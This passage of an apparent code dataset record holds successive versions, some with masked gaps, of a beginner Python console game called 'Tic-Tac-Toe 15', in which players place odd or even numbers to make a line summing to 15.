else:\n print(\n '\\nINVALID INPUT, Please try again and enter a EVEN number. '\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n elif p1_move_input < 1 or p1_move_input > 9:\n print(\n '\\nINVALID INPUT, Please try again and enter a number between 1-9. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter an unoccupied spot. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n if turn == player2:\n print('\\nIts your turn', player2 + ': ')\n print()\n p2_move_input = int(input('Move to which space? (1-9): '))\n if player_order[0] == player2:\n if 1 <= p2_move_input <= 9 and the_board[p2_move_input - 1\n ] == 0:\n print()\n p2_num_input = int(input('Enter an ODD NUMBER from 1-9: '))\n if (p2_num_input in odd_moves and p2_num_input not in\n unavailable_moves_p2):\n the_board[p2_move_input - 1] = p2_num_input\n unavailable_moves_p2.append(p2_num_input)\n elif p2_num_input in unavailable_moves_p2:\n print(\n \"\"\"\nINVALID INPUT, Please try again and enter a number that you haven't used. \"\"\"\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter an ODD number. '\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n elif p2_move_input < 1 or p2_move_input > 9:\n print(\n '\\nINVALID INPUT, Please try again and enter a number between 1-9. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter an unoccupied spot. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n elif player_order[1] == player2:\n if 1 <= p2_move_input <= 9 and the_board[p2_move_input - 1\n ] == 0:\n print()\n p2_num_input = int(input('Enter a EVEN NUMBER from 1-9: '))\n if (p2_num_input in even_moves and p2_num_input not in\n unavailable_moves_p2):\n the_board[p2_move_input - 1] = p2_num_input\n unavailable_moves_p2.append(p2_num_input)\n elif p2_num_input in unavailable_moves_p2:\n print(\n \"\"\"\nINVALID INPUT, Please try again and enter a number that you haven't used. \"\"\"\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter a EVEN number. '\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n elif p2_move_input < 1 or p2_move_input > 9:\n print(\n '\\nINVALID INPUT, Please try again and enter a number between 1-9. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n else:\n print(\n '\\nINVALID, Please try again and enter an unoccupied spot. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n except ValueError:\n print('\\nINVALID INPUT, Please try again and enter only in integers. ')\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2, player_order)\n\n\ndef check_game(board, winner):\n is_game_over = ''\n if board[0] + board[1] + board[2] == 15 and board[0] != 0 and board[1\n ] != 0 and board[2] != 0:\n print_board(board)\n print('\\n' + str(board[0]) + ',', str(board[1]) + ',', 'and', str(\n board[2]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[3] + board[4] + board[5] == 15 and board[3] != 0 and board[4\n ] != 0 and board[5] != 0:\n print_board(board)\n print('\\n' + str(board[3]) + ',', str(board[4]) + ',', 'and', str(\n board[5]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[6] + board[7] + board[8] == 15 and board[6] != 0 and board[7\n ] != 0 and board[8] != 0:\n print_board(board)\n print('\\n' + str(board[6]) + ',', str(board[7]) + ',', 'and', str(\n board[8]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[0] + board[3] + board[6] == 15 and board[0] != 0 and board[3\n ] != 0 and board[6] != 0:\n print_board(board)\n print('\\n' + str(board[0]) + ',', str(board[3]) + ',', 'and', str(\n board[6]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[1] + board[4] + board[7] == 15 and board[1] != 0 and board[4\n ] != 0 and board[7] != 0:\n print_board(board)\n print('\\n' + str(board[1]) + ',', str(board[4]) + ',', 'and', str(\n board[7]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[2] + board[5] + board[8] == 15 and board[2] != 0 and board[5\n ] != 0 and board[8] != 0:\n print_board(board)\n print('\\n' + str(board[2]) + ',', str(board[5]) + ',', 'and', str(\n board[8]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[6] + board[4] + board[2] == 15 and board[6] != 0 and board[4\n ] != 0 and board[2] != 0:\n print_board(board)\n print('\\n' + str(board[6]) + ',', str(board[4]) + ',', 'and', str(\n board[2]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[0] + board[4] + board[8] == 15 and board[0] != 0 and board[4\n ] != 0 and board[8] != 0:\n print_board(board)\n print('\\n' + str(board[0]) + ',', str(board[4]) + ',', 'and', str(\n board[8]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n return is_game_over\n\n\ndef score(score1, score2, player1, player2):\n print('\\n\\t------------------')\n print('\\t SCOREBOARD')\n print('\\t------------------')\n print('\\t' + ' ' + player1 + ':', score1)\n print('\\t' + ' ' + player2 + ':', score2)\n print('\\t------------------')\n print()\n\n\ndef play_game(score1, score2, player1, player2):\n unavailable_moves_p1 = []\n unavailable_moves_p2 = []\n player_order = []\n the_board = [0, 0, 0, 0, 0, 0, 0, 0, 0]\n count = 0\n restart = ''\n turn = choose_who_first(player1, player2, player_order)\n input('Enter anything to start the round: ')\n for i in range(10):\n print_board(the_board)\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2, player_order)\n count += 1\n if check_game(the_board, turn):\n if turn == player1:\n score1 += 1\n elif turn == player2:\n score2 += 1\n break\n if count == 9:\n print(\"No numbers added up to 15, it's a DRAW! \")\n break\n if turn == player1:\n turn = player2\n else:\n turn = player1\n input('\\nEnter anything to continue: ')\n score(score1, score2, player1, player2)\n while (restart != 'yes' or restart != 'y' or restart != 'n' or restart !=\n 'no'):\n restart = input('Do want to play Again? (y/n) ').lower()\n if restart == 'y' or restart == 'yes':\n print('\\nLoading new round...')\n play_game(score1, score2, player1, player2)\n elif restart == 'n' or restart == 'no':\n if score1 > score2:\n print('\\n' + player1, 'is the overall winner! Congratulations!'\n )\n elif score2 > score1:\n print('\\n' + player2, 'is the overall winner! Congratulations!'\n )\n elif score1 == score2:\n print(\n \"\\nBoth players have one the same amount of rounds. It's a draw! \"\n )\n print('\\nThanks for playing! ')\n break\n else:\n print('\\nPlease enter YES or NO ')\n print()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef intro():\n print(\n \"\"\"\n####### ####### ####### # ####### \n # # #### # ## #### # #### ###### ## # \n # # # # # # # # # # # # # # # # \n # # # ##### # # # # ##### # # # ##### # ###### \n # # # # ###### # # # # # # # \n # # # # # # # # # # # # # # # # \n # # #### # # # #### # #### ###### ##### ##### \n\nHow to play Tic-Tac-Toe 15: \n\nTo win, you must get three numbers in a row/column/diagonal that add up to the sum of 15! The first player enters odd numbers and the second player enters even numbers. \n\nBoard Instructions: Tell the program the position of which you would like to enter by entering the number position of \nthe boxes as shown below. Players can can only enter from numbers from 1-9. \n\n | |\n\t 1 | 2 | 3\n\t_____|_____|_____\n\t | |\n\t 4 | 5 | 6\n\t_____|_____|_____\n\t | |\n\t 7 | 8 | 9\n\t | |\n \"\"\"\n )\n\n\ndef print_board(board):\n print('\\n\\t | |')\n print('\\t {} | {} | {}'.format(board[0], board[1], board[2]))\n print('\\t_____|_____|_____')\n print('\\t | |')\n print('\\t {} | {} | {}'.format(board[3], board[4], board[5]))\n print('\\t_____|_____|_____')\n print('\\t | |')\n print('\\t {} | {} | {}'.format(board[6], board[7], board[8]))\n print('\\t | |')\n\n\ndef choose_who_first(player1, player2, player_order):\n flip = random.randint(1, 2)\n if flip == 1:\n print('\\n' + player1, 'goes first.', player1,\n 'can only play odd numbers and', player2,\n 'can only play even numbers from 1-9. ')\n print()\n player_order.append(player1)\n player_order.append(player2)\n return player1\n elif flip == 2:\n print('\\n' + player2, 'goes first.', player2,\n 'can only play odd numbers and', name1,\n 'can only play even numbers from 1-9. ')\n print()\n player_order.append(player2)\n player_order.append(player1)\n return player2\n\n\ndef make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2, player_order):\n odd_moves = [1, 3, 5, 7, 9]\n even_moves = [2, 4, 6, 8]\n try:\n if turn == player1:\n print('\\nIts your turn', player1 + ': ')\n print()\n p1_move_input = int(input('Move to which space? (1-9): '))\n if player_order[0] == player1:\n if 1 <= p1_move_input <= 9 and the_board[p1_move_input - 1\n ] == 0:\n print()\n p1_num_input = int(input('Enter an ODD NUMBER from 1-9: '))\n if (p1_num_input in odd_moves and p1_num_input not in\n unavailable_moves_p1):\n the_board[p1_move_input - 1] = p1_num_input\n unavailable_moves_p1.append(p1_num_input)\n elif p1_num_input in unavailable_moves_p1:\n print(\n \"\"\"\nINVALID INPUT, Please try again and enter a number that you haven't used. \"\"\"\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter an ODD number. '\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n elif p1_move_input < 1 or p1_move_input > 9:\n print(\n '\\nINVALID INPUT, Please try again and enter a number between 1-9. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter an unoccupied spot. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n elif player_order[1] == player1:\n if 1 <= p1_move_input <= 9 and the_board[p1_move_input - 1\n ] == 0:\n print()\n p1_num_input = int(input('Enter a EVEN NUMBER from 1-9: '))\n if (p1_num_input in even_moves and p1_num_input not in\n unavailable_moves_p1):\n the_board[p1_move_input - 1] = p1_num_input\n unavailable_moves_p1.append(p1_num_input)\n elif p1_num_input in unavailable_moves_p1:\n print(\n \"\"\"\nINVALID INPUT, Please try again and enter a number that you haven't used. \"\"\"\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter a EVEN number. '\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n elif p1_move_input < 1 or p1_move_input > 9:\n print(\n '\\nINVALID INPUT, Please try again and enter a number between 1-9. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter an unoccupied spot. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n if turn == player2:\n print('\\nIts your turn', player2 + ': ')\n print()\n p2_move_input = int(input('Move to which space? (1-9): '))\n if player_order[0] == player2:\n if 1 <= p2_move_input <= 9 and the_board[p2_move_input - 1\n ] == 0:\n print()\n p2_num_input = int(input('Enter an ODD NUMBER from 1-9: '))\n if (p2_num_input in odd_moves and p2_num_input not in\n unavailable_moves_p2):\n the_board[p2_move_input - 1] = p2_num_input\n unavailable_moves_p2.append(p2_num_input)\n elif p2_num_input in unavailable_moves_p2:\n print(\n \"\"\"\nINVALID INPUT, Please try again and enter a number that you haven't used. \"\"\"\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter an ODD number. '\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n elif p2_move_input < 1 or p2_move_input > 9:\n print(\n '\\nINVALID INPUT, Please try again and enter a number between 1-9. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter an unoccupied spot. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n elif player_order[1] == player2:\n if 1 <= p2_move_input <= 9 and the_board[p2_move_input - 1\n ] == 0:\n print()\n p2_num_input = int(input('Enter a EVEN NUMBER from 1-9: '))\n if (p2_num_input in even_moves and p2_num_input not in\n unavailable_moves_p2):\n the_board[p2_move_input - 1] = p2_num_input\n unavailable_moves_p2.append(p2_num_input)\n elif p2_num_input in unavailable_moves_p2:\n print(\n \"\"\"\nINVALID INPUT, Please try again and enter a number that you haven't used. \"\"\"\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter a EVEN number. '\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n elif p2_move_input < 1 or p2_move_input > 9:\n print(\n '\\nINVALID INPUT, Please try again and enter a number between 1-9. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n else:\n print(\n '\\nINVALID, Please try again and enter an unoccupied spot. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n except ValueError:\n print('\\nINVALID INPUT, Please try again and enter only in integers. ')\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2, player_order)\n\n\ndef check_game(board, winner):\n is_game_over = ''\n if board[0] + board[1] + board[2] == 15 and board[0] != 0 and board[1\n ] != 0 and board[2] != 0:\n print_board(board)\n print('\\n' + str(board[0]) + ',', str(board[1]) + ',', 'and', str(\n board[2]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[3] + board[4] + board[5] == 15 and board[3] != 0 and board[4\n ] != 0 and board[5] != 0:\n print_board(board)\n print('\\n' + str(board[3]) + ',', str(board[4]) + ',', 'and', str(\n board[5]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[6] + board[7] + board[8] == 15 and board[6] != 0 and board[7\n ] != 0 and board[8] != 0:\n print_board(board)\n print('\\n' + str(board[6]) + ',', str(board[7]) + ',', 'and', str(\n board[8]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[0] + board[3] + board[6] == 15 and board[0] != 0 and board[3\n ] != 0 and board[6] != 0:\n print_board(board)\n print('\\n' + str(board[0]) + ',', str(board[3]) + ',', 'and', str(\n board[6]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[1] + board[4] + board[7] == 15 and board[1] != 0 and board[4\n ] != 0 and board[7] != 0:\n print_board(board)\n print('\\n' + str(board[1]) + ',', str(board[4]) + ',', 'and', str(\n board[7]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[2] + board[5] + board[8] == 15 and board[2] != 0 and board[5\n ] != 0 and board[8] != 0:\n print_board(board)\n print('\\n' + str(board[2]) + ',', str(board[5]) + ',', 'and', str(\n board[8]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[6] + board[4] + board[2] == 15 and board[6] != 0 and board[4\n ] != 0 and board[2] != 0:\n print_board(board)\n print('\\n' + str(board[6]) + ',', str(board[4]) + ',', 'and', str(\n board[2]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[0] + board[4] + board[8] == 15 and board[0] != 0 and board[4\n ] != 0 and board[8] != 0:\n print_board(board)\n print('\\n' + str(board[0]) + ',', str(board[4]) + ',', 'and', str(\n board[8]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n return is_game_over\n\n\ndef score(score1, score2, player1, player2):\n print('\\n\\t------------------')\n print('\\t SCOREBOARD')\n print('\\t------------------')\n print('\\t' + ' ' + player1 + ':', score1)\n print('\\t' + ' ' + player2 + ':', score2)\n print('\\t------------------')\n print()\n\n\ndef play_game(score1, score2, player1, player2):\n unavailable_moves_p1 = []\n unavailable_moves_p2 = []\n player_order = []\n the_board = [0, 0, 0, 0, 0, 0, 0, 0, 0]\n count = 0\n restart = ''\n turn = choose_who_first(player1, player2, player_order)\n input('Enter anything to start the round: ')\n for i in range(10):\n print_board(the_board)\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2, player_order)\n count += 1\n if check_game(the_board, turn):\n if turn == player1:\n score1 += 1\n elif turn == player2:\n score2 += 1\n break\n if count == 9:\n print(\"No numbers added up to 15, it's a DRAW! \")\n break\n if turn == player1:\n turn = player2\n else:\n turn = player1\n input('\\nEnter anything to continue: ')\n score(score1, score2, player1, player2)\n while (restart != 'yes' or restart != 'y' or restart != 'n' or restart !=\n 'no'):\n restart = input('Do want to play Again? (y/n) ').lower()\n if restart == 'y' or restart == 'yes':\n print('\\nLoading new round...')\n play_game(score1, score2, player1, player2)\n elif restart == 'n' or restart == 'no':\n if score1 > score2:\n print('\\n' + player1, 'is the overall winner! Congratulations!'\n )\n elif score2 > score1:\n print('\\n' + player2, 'is the overall winner! Congratulations!'\n )\n elif score1 == score2:\n print(\n \"\\nBoth players have one the same amount of rounds. It's a draw! \"\n )\n print('\\nThanks for playing! ')\n break\n else:\n print('\\nPlease enter YES or NO ')\n print()\n\n\nif __name__ == '__main__':\n intro()\n input('Enter anything to continue: ')\n print('\\nEnter usernames: ')\n name1 = input('\\nPlayer 1, Enter your name: ').title()\n name2 = input('\\nPlayer 2, Enter your name: ').title()\n p1_score = 0\n p2_score = 0\n play_game(p1_score, p2_score, name1, name2)\n",
"step-4": "import random\n\n\ndef intro():\n print(\n \"\"\"\n####### ####### ####### # ####### \n # # #### # ## #### # #### ###### ## # \n # # # # # # # # # # # # # # # # \n # # # ##### # # # # ##### # # # ##### # ###### \n # # # # ###### # # # # # # # \n # # # # # # # # # # # # # # # # \n # # #### # # # #### # #### ###### ##### ##### \n\nHow to play Tic-Tac-Toe 15: \n\nTo win, you must get three numbers in a row/column/diagonal that add up to the sum of 15! The first player enters odd numbers and the second player enters even numbers. \n\nBoard Instructions: Tell the program the position of which you would like to enter by entering the number position of \nthe boxes as shown below. Players can can only enter from numbers from 1-9. \n\n | |\n\t 1 | 2 | 3\n\t_____|_____|_____\n\t | |\n\t 4 | 5 | 6\n\t_____|_____|_____\n\t | |\n\t 7 | 8 | 9\n\t | |\n \"\"\"\n )\n\n\ndef print_board(board):\n print('\\n\\t | |')\n print('\\t {} | {} | {}'.format(board[0], board[1], board[2]))\n print('\\t_____|_____|_____')\n print('\\t | |')\n print('\\t {} | {} | {}'.format(board[3], board[4], board[5]))\n print('\\t_____|_____|_____')\n print('\\t | |')\n print('\\t {} | {} | {}'.format(board[6], board[7], board[8]))\n print('\\t | |')\n\n\ndef choose_who_first(player1, player2, player_order):\n flip = random.randint(1, 2)\n if flip == 1:\n print('\\n' + player1, 'goes first.', player1,\n 'can only play odd numbers and', player2,\n 'can only play even numbers from 1-9. ')\n print()\n player_order.append(player1)\n player_order.append(player2)\n return player1\n elif flip == 2:\n print('\\n' + player2, 'goes first.', player2,\n 'can only play odd numbers and', name1,\n 'can only play even numbers from 1-9. ')\n print()\n player_order.append(player2)\n player_order.append(player1)\n return player2\n\n\ndef make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2, player_order):\n odd_moves = [1, 3, 5, 7, 9]\n even_moves = [2, 4, 6, 8]\n try:\n if turn == player1:\n print('\\nIts your turn', player1 + ': ')\n print()\n p1_move_input = int(input('Move to which space? (1-9): '))\n if player_order[0] == player1:\n if 1 <= p1_move_input <= 9 and the_board[p1_move_input - 1\n ] == 0:\n print()\n p1_num_input = int(input('Enter an ODD NUMBER from 1-9: '))\n if (p1_num_input in odd_moves and p1_num_input not in\n unavailable_moves_p1):\n the_board[p1_move_input - 1] = p1_num_input\n unavailable_moves_p1.append(p1_num_input)\n elif p1_num_input in unavailable_moves_p1:\n print(\n \"\"\"\nINVALID INPUT, Please try again and enter a number that you haven't used. \"\"\"\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter an ODD number. '\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n elif p1_move_input < 1 or p1_move_input > 9:\n print(\n '\\nINVALID INPUT, Please try again and enter a number between 1-9. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter an unoccupied spot. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n elif player_order[1] == player1:\n if 1 <= p1_move_input <= 9 and the_board[p1_move_input - 1\n ] == 0:\n print()\n p1_num_input = int(input('Enter a EVEN NUMBER from 1-9: '))\n if (p1_num_input in even_moves and p1_num_input not in\n unavailable_moves_p1):\n the_board[p1_move_input - 1] = p1_num_input\n unavailable_moves_p1.append(p1_num_input)\n elif p1_num_input in unavailable_moves_p1:\n print(\n \"\"\"\nINVALID INPUT, Please try again and enter a number that you haven't used. \"\"\"\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter a EVEN number. '\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n elif p1_move_input < 1 or p1_move_input > 9:\n print(\n '\\nINVALID INPUT, Please try again and enter a number between 1-9. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter an unoccupied spot. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n if turn == player2:\n print('\\nIts your turn', player2 + ': ')\n print()\n p2_move_input = int(input('Move to which space? (1-9): '))\n if player_order[0] == player2:\n if 1 <= p2_move_input <= 9 and the_board[p2_move_input - 1\n ] == 0:\n print()\n p2_num_input = int(input('Enter an ODD NUMBER from 1-9: '))\n if (p2_num_input in odd_moves and p2_num_input not in\n unavailable_moves_p2):\n the_board[p2_move_input - 1] = p2_num_input\n unavailable_moves_p2.append(p2_num_input)\n elif p2_num_input in unavailable_moves_p2:\n print(\n \"\"\"\nINVALID INPUT, Please try again and enter a number that you haven't used. \"\"\"\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter an ODD number. '\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n elif p2_move_input < 1 or p2_move_input > 9:\n print(\n '\\nINVALID INPUT, Please try again and enter a number between 1-9. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter an unoccupied spot. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n elif player_order[1] == player2:\n if 1 <= p2_move_input <= 9 and the_board[p2_move_input - 1\n ] == 0:\n print()\n p2_num_input = int(input('Enter a EVEN NUMBER from 1-9: '))\n if (p2_num_input in even_moves and p2_num_input not in\n unavailable_moves_p2):\n the_board[p2_move_input - 1] = p2_num_input\n unavailable_moves_p2.append(p2_num_input)\n elif p2_num_input in unavailable_moves_p2:\n print(\n \"\"\"\nINVALID INPUT, Please try again and enter a number that you haven't used. \"\"\"\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n else:\n print(\n '\\nINVALID INPUT, Please try again and enter a EVEN number. '\n )\n make_move_and_update(the_board, turn, player1,\n player2, unavailable_moves_p1,\n unavailable_moves_p2, player_order)\n elif p2_move_input < 1 or p2_move_input > 9:\n print(\n '\\nINVALID INPUT, Please try again and enter a number between 1-9. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n else:\n print(\n '\\nINVALID, Please try again and enter an unoccupied spot. '\n )\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2,\n player_order)\n except ValueError:\n print('\\nINVALID INPUT, Please try again and enter only in integers. ')\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2, player_order)\n\n\ndef check_game(board, winner):\n is_game_over = ''\n if board[0] + board[1] + board[2] == 15 and board[0] != 0 and board[1\n ] != 0 and board[2] != 0:\n print_board(board)\n print('\\n' + str(board[0]) + ',', str(board[1]) + ',', 'and', str(\n board[2]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[3] + board[4] + board[5] == 15 and board[3] != 0 and board[4\n ] != 0 and board[5] != 0:\n print_board(board)\n print('\\n' + str(board[3]) + ',', str(board[4]) + ',', 'and', str(\n board[5]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[6] + board[7] + board[8] == 15 and board[6] != 0 and board[7\n ] != 0 and board[8] != 0:\n print_board(board)\n print('\\n' + str(board[6]) + ',', str(board[7]) + ',', 'and', str(\n board[8]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[0] + board[3] + board[6] == 15 and board[0] != 0 and board[3\n ] != 0 and board[6] != 0:\n print_board(board)\n print('\\n' + str(board[0]) + ',', str(board[3]) + ',', 'and', str(\n board[6]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[1] + board[4] + board[7] == 15 and board[1] != 0 and board[4\n ] != 0 and board[7] != 0:\n print_board(board)\n print('\\n' + str(board[1]) + ',', str(board[4]) + ',', 'and', str(\n board[7]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[2] + board[5] + board[8] == 15 and board[2] != 0 and board[5\n ] != 0 and board[8] != 0:\n print_board(board)\n print('\\n' + str(board[2]) + ',', str(board[5]) + ',', 'and', str(\n board[8]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[6] + board[4] + board[2] == 15 and board[6] != 0 and board[4\n ] != 0 and board[2] != 0:\n print_board(board)\n print('\\n' + str(board[6]) + ',', str(board[4]) + ',', 'and', str(\n board[2]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n elif board[0] + board[4] + board[8] == 15 and board[0] != 0 and board[4\n ] != 0 and board[8] != 0:\n print_board(board)\n print('\\n' + str(board[0]) + ',', str(board[4]) + ',', 'and', str(\n board[8]), 'add up to 15! ')\n print('\\n' + winner, 'wins! ')\n is_game_over = True\n return is_game_over\n\n\ndef score(score1, score2, player1, player2):\n print('\\n\\t------------------')\n print('\\t SCOREBOARD')\n print('\\t------------------')\n print('\\t' + ' ' + player1 + ':', score1)\n print('\\t' + ' ' + player2 + ':', score2)\n print('\\t------------------')\n print()\n\n\ndef play_game(score1, score2, player1, player2):\n unavailable_moves_p1 = []\n unavailable_moves_p2 = []\n player_order = []\n the_board = [0, 0, 0, 0, 0, 0, 0, 0, 0]\n count = 0\n restart = ''\n turn = choose_who_first(player1, player2, player_order)\n input('Enter anything to start the round: ')\n for i in range(10):\n print_board(the_board)\n make_move_and_update(the_board, turn, player1, player2,\n unavailable_moves_p1, unavailable_moves_p2, player_order)\n count += 1\n if check_game(the_board, turn):\n if turn == player1:\n score1 += 1\n elif turn == player2:\n score2 += 1\n break\n if count == 9:\n print(\"No numbers added up to 15, it's a DRAW! \")\n break\n if turn == player1:\n turn = player2\n else:\n turn = player1\n input('\\nEnter anything to continue: ')\n score(score1, score2, player1, player2)\n while (restart != 'yes' or restart != 'y' or restart != 'n' or restart !=\n 'no'):\n restart = input('Do want to play Again? (y/n) ').lower()\n if restart == 'y' or restart == 'yes':\n print('\\nLoading new round...')\n play_game(score1, score2, player1, player2)\n elif restart == 'n' or restart == 'no':\n if score1 > score2:\n print('\\n' + player1, 'is the overall winner! Congratulations!'\n )\n elif score2 > score1:\n print('\\n' + player2, 'is the overall winner! Congratulations!'\n )\n elif score1 == score2:\n print(\n \"\\nBoth players have one the same amount of rounds. It's a draw! \"\n )\n print('\\nThanks for playing! ')\n break\n else:\n print('\\nPlease enter YES or NO ')\n print()\n\n\nif __name__ == '__main__':\n intro()\n input('Enter anything to continue: ')\n print('\\nEnter usernames: ')\n name1 = input('\\nPlayer 1, Enter your name: ').title()\n name2 = input('\\nPlayer 2, Enter your name: ').title()\n p1_score = 0\n p2_score = 0\n 